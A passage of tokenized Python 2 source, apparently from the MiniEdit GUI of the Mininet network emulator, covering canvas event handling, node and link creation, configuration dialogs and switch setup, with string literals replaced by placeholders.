) > <NUM_LIT:0> : <EOL> sflowEnabled = False <EOL> sflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> sflowSwitches = sflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> sflowEnabled = True <EOL> if sflowEnabled : <EOL> sflowCmd = '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + sflowCmd + sflowSwitches + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> def canvasHandle ( self , eventName , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is None : <EOL> return <EOL> toolName = self . active <EOL> handler = getattr ( self , eventName + toolName , None ) <EOL> if handler is not None : <EOL> handler ( event ) <EOL> def clickCanvas ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . canvasHandle ( '<STR_LIT>' , event ) <EOL> def dragCanvas ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . canvasHandle ( '<STR_LIT>' , event ) <EOL> def releaseCanvas ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . canvasHandle ( '<STR_LIT>' , event ) <EOL> def findItem ( self , x , y ) : <EOL> "<STR_LIT>" <EOL> items = self . canvas . find_overlapping ( x , y , x , y ) <EOL> if len ( items ) == <NUM_LIT:0> : <EOL> return None <EOL> else : <EOL> return items [ <NUM_LIT:0> ] <EOL> def clickSelect ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( self . findItem ( event . x , event . y ) ) <EOL> def deleteItem ( self , item ) : <EOL> "<STR_LIT>" <EOL> if self . buttons [ '<STR_LIT>' ] [ '<STR_LIT:state>' ] == '<STR_LIT>' : <EOL> return <EOL> if item in self . links : <EOL> self . deleteLink ( item ) <EOL> if item in self . itemToWidget : <EOL> self . deleteNode ( item ) <EOL> self . canvas . delete ( item ) <EOL> def deleteSelection ( self , _event ) : <EOL> "<STR_LIT>" <EOL> if self . selection is not None : <EOL> self . deleteItem ( self . selection ) <EOL> self . selectItem ( None ) <EOL> def nodeIcon ( self , node , name ) : <EOL> "<STR_LIT>" <EOL> icon = Button ( self . canvas , image = self . images [ node ] , <EOL> text = name , compound = '<STR_LIT>' ) <EOL> bindtags = [ str ( self . nodeBindings ) ] <EOL> bindtags += list ( icon . bindtags ( ) ) <EOL> icon . bindtags ( tuple ( bindtags ) ) <EOL> return icon <EOL> def newNode ( self , node , event ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> x , y = c . canvasx ( event . x ) , c . canvasy ( event . y ) <EOL> name = self . nodePrefixes [ node ] <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . switchCount ) <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . switchCount ) <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . switchCount ) <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' == node : <EOL> self . hostCount += <NUM_LIT:1> <EOL> name = self . nodePrefixes [ node ] + str ( self . hostCount ) <EOL> self . hostOpts [ name ] = { '<STR_LIT>' : '<STR_LIT:host>' } <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = self . hostCount <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = name <EOL> if '<STR_LIT>' == node : <EOL> name = self . nodePrefixes [ node ] + str ( self . controllerCount ) <EOL> ctrlr = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:127.0.0.1>' , <EOL> '<STR_LIT>' : <NUM_LIT> } <EOL> self . controllers [ name ] = ctrlr <EOL> self . controllerCount += <NUM_LIT:1> <EOL> icon = self . nodeIcon ( node , name ) <EOL> item = self . canvas . create_window ( x , y , anchor = '<STR_LIT:c>' , window = icon , <EOL> tags = node ) <EOL> self . widgetToItem [ icon ] = item <EOL> self . itemToWidget [ item ] = icon <EOL> self . selectItem ( item ) <EOL> icon . links = { } <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_switchPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_legacyRouterPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_legacySwitchPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_hostPopup ) <EOL> if '<STR_LIT>' == node : <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> def clickController ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickHost ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickLegacyRouter ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickLegacySwitch ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def clickSwitch ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . newNode ( '<STR_LIT>' , event ) <EOL> def dragNetLink ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . link is None : <EOL> return <EOL> x = self . canvasx ( event . x_root ) <EOL> y = self . canvasy ( event . y_root ) <EOL> c = self . canvas <EOL> c . coords ( self . link , self . linkx , self . linky , x , y ) <EOL> def releaseNetLink ( self , _event ) : <EOL> "<STR_LIT>" <EOL> if self . link is not None : <EOL> self . canvas . delete ( self . link ) <EOL> self . linkWidget = self . linkItem = self . link = None <EOL> def createNodeBindings ( self ) : <EOL> "<STR_LIT>" <EOL> bindings = { <EOL> '<STR_LIT>' : self . clickNode , <EOL> '<STR_LIT>' : self . dragNode , <EOL> '<STR_LIT>' : self . releaseNode , <EOL> '<STR_LIT>' : self . enterNode , <EOL> '<STR_LIT>' : self . leaveNode <EOL> } <EOL> l = Label ( ) <EOL> for event , binding in bindings . items ( ) : <EOL> l . bind ( event , binding ) <EOL> return l <EOL> def selectItem ( self , item ) : <EOL> "<STR_LIT>" <EOL> self . lastSelection = self . selection <EOL> self . selection = item <EOL> def enterNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> self . selectNode ( event ) <EOL> def leaveNode ( self , _event ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( self . lastSelection ) <EOL> def clickNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is '<STR_LIT>' : <EOL> self . startLink ( event ) <EOL> else : <EOL> self . selectNode ( event ) <EOL> return '<STR_LIT>' <EOL> def dragNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is '<STR_LIT>' : <EOL> self . dragNetLink ( event ) <EOL> else : <EOL> self . dragNodeAround ( event ) <EOL> def releaseNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . active is '<STR_LIT>' : <EOL> self . finishLink ( event ) <EOL> def selectNode ( self , event ) : <EOL> "<STR_LIT>" <EOL> item = self . widgetToItem . get ( event . widget , None ) <EOL> self . selectItem ( item ) <EOL> def dragNodeAround ( self , event ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> x = self . canvasx ( event . x_root ) <EOL> y = self . canvasy ( event . y_root ) <EOL> w = event . widget <EOL> item = self . widgetToItem [ w ] <EOL> c . coords ( item , x , y ) <EOL> for dest in w . links : <EOL> link = w . links [ dest ] <EOL> item = self . widgetToItem [ dest ] <EOL> x1 , y1 = c . coords ( item ) <EOL> c . coords ( link , x , y , x1 , y1 ) <EOL> self . updateScrollRegion ( ) <EOL> def createControlLinkBindings ( self ) : <EOL> "<STR_LIT>" <EOL> def select ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> def highlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> def unhighlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , highlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , unhighlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , select ) <EOL> def createDataLinkBindings ( self ) : <EOL> "<STR_LIT>" <EOL> def select ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> def highlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . selectItem ( link ) <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> def unhighlight ( _event , link = self . link ) : <EOL> "<STR_LIT>" <EOL> self . canvas . itemconfig ( link , fill = '<STR_LIT>' ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , highlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , unhighlight ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , select ) <EOL> self . canvas . tag_bind ( self . link , '<STR_LIT>' , self . do_linkPopup ) <EOL> def startLink ( self , event ) : <EOL> "<STR_LIT>" <EOL> if event . widget not in self . widgetToItem : <EOL> return <EOL> w = event . widget <EOL> item = self . widgetToItem [ w ] <EOL> x , y = self . canvas . coords ( item ) <EOL> self . link = self . canvas . create_line ( x , y , x , y , width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , tag = '<STR_LIT>' ) <EOL> self . linkx , self . linky = x , y <EOL> self . linkWidget = w <EOL> self . linkItem = item <EOL> def finishLink ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . link is None : <EOL> return <EOL> source = self . linkWidget <EOL> c = self . canvas <EOL> x , y = self . canvasx ( event . x_root ) , self . canvasy ( event . y_root ) <EOL> target = self . findItem ( x , y ) <EOL> dest = self . itemToWidget . get ( target , None ) <EOL> if ( source is None or dest is None or source == dest <EOL> or dest in source . links or source in dest . links ) : <EOL> self . releaseNetLink ( event ) <EOL> return <EOL> stags = self . canvas . gettags ( self . widgetToItem [ source ] ) <EOL> dtags = self . canvas . gettags ( target ) <EOL> if ( ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in dtags and '<STR_LIT>' in stags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in dtags and '<STR_LIT>' in stags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in dtags and '<STR_LIT>' in stags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) or <EOL> ( '<STR_LIT>' in stags and '<STR_LIT>' in dtags ) ) : <EOL> self . releaseNetLink ( event ) <EOL> return <EOL> linkType = '<STR_LIT:data>' <EOL> if '<STR_LIT>' in stags or '<STR_LIT>' in dtags : <EOL> linkType = '<STR_LIT>' <EOL> c . itemconfig ( self . link , dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , fill = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> else : <EOL> linkType = '<STR_LIT:data>' <EOL> self . createDataLinkBindings ( ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( linkType , ) ) <EOL> x , y = c . coords ( target ) <EOL> c . coords ( self . link , self . linkx , self . linky , x , y ) <EOL> self . addLink ( source , dest , linktype = linkType ) <EOL> if linkType == '<STR_LIT>' : <EOL> controllerName = '<STR_LIT>' <EOL> switchName = '<STR_LIT>' <EOL> if '<STR_LIT>' in stags : <EOL> controllerName = source [ '<STR_LIT:text>' ] <EOL> switchName = dest [ '<STR_LIT:text>' ] <EOL> else : <EOL> controllerName = dest [ '<STR_LIT:text>' ] <EOL> switchName = source [ '<STR_LIT:text>' ] <EOL> self . switchOpts [ switchName ] [ '<STR_LIT>' ] . append ( controllerName ) <EOL> self . link = self . linkWidget = None <EOL> def about ( self ) : <EOL> "<STR_LIT>" <EOL> about = self . aboutBox <EOL> if about is None : <EOL> bg = '<STR_LIT>' <EOL> about = Toplevel ( bg = '<STR_LIT>' ) <EOL> about . title ( '<STR_LIT>' ) <EOL> desc = self . appName + '<STR_LIT>' <EOL> version = '<STR_LIT>' + MINIEDIT_VERSION <EOL> author = '<STR_LIT>' <EOL> enhancements = '<STR_LIT>' <EOL> www = '<STR_LIT>' <EOL> line1 = Label ( about , text = desc , font = '<STR_LIT>' , bg = bg ) <EOL> line2 = Label ( about , text = version , font = '<STR_LIT>' , bg = bg ) <EOL> line3 = Label ( about , text = author , font = '<STR_LIT>' , bg = bg ) <EOL> line4 = Label ( about , text = enhancements , font = '<STR_LIT>' , bg = bg ) <EOL> line5 = Entry ( about , font = '<STR_LIT>' , bg = bg , width = len ( www ) , justify = CENTER ) <EOL> line5 . insert ( <NUM_LIT:0> , www ) <EOL> line5 . configure ( state = '<STR_LIT>' ) <EOL> line1 . pack ( padx = <NUM_LIT:20> , pady = <NUM_LIT:10> ) <EOL> line2 . pack ( pady = <NUM_LIT:10> ) <EOL> line3 . pack ( pady = <NUM_LIT:10> ) <EOL> line4 . pack ( pady = <NUM_LIT:10> ) <EOL> line5 . pack ( pady = <NUM_LIT:10> ) <EOL> hide = ( lambda about = about : about . withdraw ( ) ) <EOL> self . aboutBox = about <EOL> Wm . wm_protocol ( about , name = '<STR_LIT>' , func = hide ) <EOL> about . deiconify ( ) <EOL> def createToolImages ( self ) : <EOL> "<STR_LIT>" <EOL> @ staticmethod <EOL> def checkIntf ( intf ) : <EOL> "<STR_LIT>" <EOL> if ( '<STR_LIT>' % intf ) not in quietRun ( '<STR_LIT>' ) : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + intf + '<STR_LIT>' ) <EOL> return False <EOL> ips = re . findall ( r'<STR_LIT>' , quietRun ( '<STR_LIT>' + intf ) ) <EOL> if ips : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = intf + '<STR_LIT>' ) <EOL> return False <EOL> return True <EOL> def hostDetails ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is not None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> widget = self . itemToWidget [ self . selection ] <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> if '<STR_LIT>' not in tags : <EOL> return <EOL> prefDefaults = self . hostOpts [ name ] <EOL> hostBox = HostDialog ( self , title = '<STR_LIT>' , prefDefaults = prefDefaults ) <EOL> self . master . wait_window ( hostBox . top ) <EOL> if hostBox . result : <EOL> newHostOpts = { '<STR_LIT>' : self . hostOpts [ name ] [ '<STR_LIT>' ] } <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = float ( hostBox . result [ '<STR_LIT>' ] ) <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> name = hostBox . result [ '<STR_LIT>' ] <EOL> widget [ '<STR_LIT:text>' ] = name <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> if len ( hostBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newHostOpts [ '<STR_LIT>' ] = hostBox . result [ '<STR_LIT>' ] <EOL> self . hostOpts [ name ] = newHostOpts <EOL> print '<STR_LIT>' + name + '<STR_LIT>' + str ( newHostOpts ) <EOL> def switchDetails ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is not None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> widget = self . itemToWidget [ self . selection ] <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> if '<STR_LIT>' not in tags : <EOL> return <EOL> prefDefaults = self . switchOpts [ name ] <EOL> switchBox = SwitchDialog ( self , title = '<STR_LIT>' , prefDefaults = prefDefaults ) <EOL> self . master . wait_window ( switchBox . top ) <EOL> if switchBox . result : <EOL> newSwitchOpts = { '<STR_LIT>' : self . switchOpts [ name ] [ '<STR_LIT>' ] } <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = self . switchOpts [ name ] [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> name = switchBox . result [ '<STR_LIT>' ] <EOL> widget [ '<STR_LIT:text>' ] = name <EOL> if len ( switchBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> newSwitchOpts [ '<STR_LIT>' ] = switchBox . result [ '<STR_LIT>' ] <EOL> self . switchOpts [ name ] = newSwitchOpts <EOL> print '<STR_LIT>' + name + '<STR_LIT>' + str ( newSwitchOpts ) <EOL> def linkUp ( self ) : <EOL> if ( self . selection is None or <EOL> self . net is None ) : <EOL> return <EOL> link = self . selection <EOL> linkDetail = self . links [ link ] <EOL> src = linkDetail [ '<STR_LIT:src>' ] <EOL> dst = linkDetail [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> self . net . configLinkStatus ( srcName , dstName , '<STR_LIT>' ) <EOL> self . canvas . itemconfig ( link , dash = ( ) ) <EOL> def linkDown ( self ) : <EOL> if ( self . selection is None or <EOL> self . net is None ) : <EOL> return <EOL> link = self . selection <EOL> linkDetail = self . links [ link ] <EOL> src = linkDetail [ '<STR_LIT:src>' ] <EOL> dst = linkDetail [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> self . net . configLinkStatus ( srcName , dstName , '<STR_LIT>' ) <EOL> self . canvas . itemconfig ( link , dash = ( <NUM_LIT:4> , <NUM_LIT:4> ) ) <EOL> def linkDetails ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is not None ) : <EOL> return <EOL> link = self . selection <EOL> linkDetail = self . links [ link ] <EOL> linkopts = linkDetail [ '<STR_LIT>' ] <EOL> linkBox = LinkDialog ( self , title = '<STR_LIT>' , linkDefaults = linkopts ) <EOL> if linkBox . result is not None : <EOL> linkDetail [ '<STR_LIT>' ] = linkBox . result <EOL> print '<STR_LIT>' + str ( linkBox . result ) <EOL> def prefDetails ( self ) : <EOL> prefDefaults = self . appPrefs <EOL> prefBox = PrefsDialog ( self , title = '<STR_LIT>' , prefDefaults = prefDefaults ) <EOL> print '<STR_LIT>' + str ( prefBox . result ) <EOL> if prefBox . result : <EOL> self . appPrefs = prefBox . result <EOL> def controllerDetails ( self ) : <EOL> if ( self . selection is None or <EOL> self . net is not None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> widget = self . itemToWidget [ self . selection ] <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> oldName = name <EOL> if '<STR_LIT>' not in tags : <EOL> return <EOL> ctrlrBox = ControllerDialog ( self , title = '<STR_LIT>' , ctrlrDefaults = self . controllers [ name ] ) <EOL> if ctrlrBox . result : <EOL> if len ( ctrlrBox . result [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> name = ctrlrBox . result [ '<STR_LIT>' ] <EOL> widget [ '<STR_LIT:text>' ] = name <EOL> else : <EOL> ctrlrBox . result [ '<STR_LIT>' ] = name <EOL> self . controllers [ name ] = ctrlrBox . result <EOL> print '<STR_LIT>' + name + '<STR_LIT>' + str ( self . controllers [ name ] ) <EOL> if oldName != name : <EOL> for widget in self . widgetToItem : <EOL> switchName = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> switch = self . switchOpts [ switchName ] <EOL> if oldName in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] . remove ( oldName ) <EOL> switch [ '<STR_LIT>' ] . append ( name ) <EOL> def listBridge ( self , _ignore = None ) : <EOL> if ( self . selection is None or <EOL> self . net is None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> name = self . itemToWidget [ self . selection ] [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . selection ) <EOL> if name not in self . net . nameToNode : <EOL> return <EOL> if '<STR_LIT>' in tags or '<STR_LIT>' in tags : <EOL> call ( [ "<STR_LIT>" + name + "<STR_LIT>" ] , shell = True ) <EOL> @ staticmethod <EOL> def ovsShow ( _ignore = None ) : <EOL> call ( [ "<STR_LIT>" ] , shell = True ) <EOL> @ staticmethod <EOL> def rootTerminal ( _ignore = None ) : <EOL> call ( [ "<STR_LIT>" ] , shell = True ) <EOL> def addLink ( self , source , dest , linktype = '<STR_LIT:data>' , linkopts = None ) : <EOL> "<STR_LIT>" <EOL> if linkopts is None : <EOL> linkopts = { } <EOL> source . links [ dest ] = self . link <EOL> dest . links [ source ] = self . link <EOL> self . links [ self . link ] = { '<STR_LIT:type>' : linktype , <EOL> '<STR_LIT:src>' : source , <EOL> '<STR_LIT>' : dest , <EOL> '<STR_LIT>' : linkopts } <EOL> def deleteLink ( self , link ) : <EOL> "<STR_LIT>" <EOL> pair = self . links . get ( link , None ) <EOL> if pair is not None : <EOL> source = pair [ '<STR_LIT:src>' ] <EOL> dest = pair [ '<STR_LIT>' ] <EOL> del source . links [ dest ] <EOL> del dest . links [ source ] <EOL> stags = self . canvas . gettags ( self . widgetToItem [ source ] ) <EOL> ltags = self . canvas . gettags ( link ) <EOL> if '<STR_LIT>' in ltags : <EOL> controllerName = '<STR_LIT>' <EOL> switchName = '<STR_LIT>' <EOL> if '<STR_LIT>' in stags : <EOL> controllerName = source [ '<STR_LIT:text>' ] <EOL> switchName = dest [ '<STR_LIT:text>' ] <EOL> else : <EOL> controllerName = dest [ '<STR_LIT:text>' ] <EOL> switchName = source [ '<STR_LIT:text>' ] <EOL> if controllerName in self . switchOpts [ switchName ] [ '<STR_LIT>' ] : <EOL> self . switchOpts [ switchName ] [ '<STR_LIT>' ] . remove ( controllerName ) <EOL> if link is not None : <EOL> del self . links [ link ] <EOL> def deleteNode ( self , item ) : <EOL> "<STR_LIT>" <EOL> widget = self . itemToWidget [ item ] <EOL> tags = self . canvas . gettags ( item ) <EOL> if '<STR_LIT>' in tags : <EOL> for serachwidget in self . widgetToItem : <EOL> name = serachwidget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ serachwidget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> if widget [ '<STR_LIT:text>' ] in self . switchOpts [ name ] [ '<STR_LIT>' ] : <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] . remove ( widget [ '<STR_LIT:text>' ] ) <EOL> for link in widget . links . values ( ) : <EOL> self . deleteItem ( link ) <EOL> del self . itemToWidget [ item ] <EOL> del self . widgetToItem [ widget ] <EOL> def buildNodes ( self , net ) : <EOL> print "<STR_LIT>" <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> switchClass = customOvs <EOL> switchParms = { } <EOL> if '<STR_LIT>' in opts : <EOL> switchParms [ '<STR_LIT>' ] = int ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> switchParms [ '<STR_LIT>' ] = opts [ '<STR_LIT>' ] <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:default>' : <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchClass = IVSSwitch <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> switchClass = CustomUserSwitch <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchParms [ '<STR_LIT>' ] = True <EOL> switchClass = CustomUserSwitch <EOL> else : <EOL> switchClass = customOvs <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> switchClass = CustomUserSwitch <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchClass = CustomUserSwitch <EOL> switchParms [ '<STR_LIT>' ] = True <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> switchClass = IVSSwitch <EOL> else : 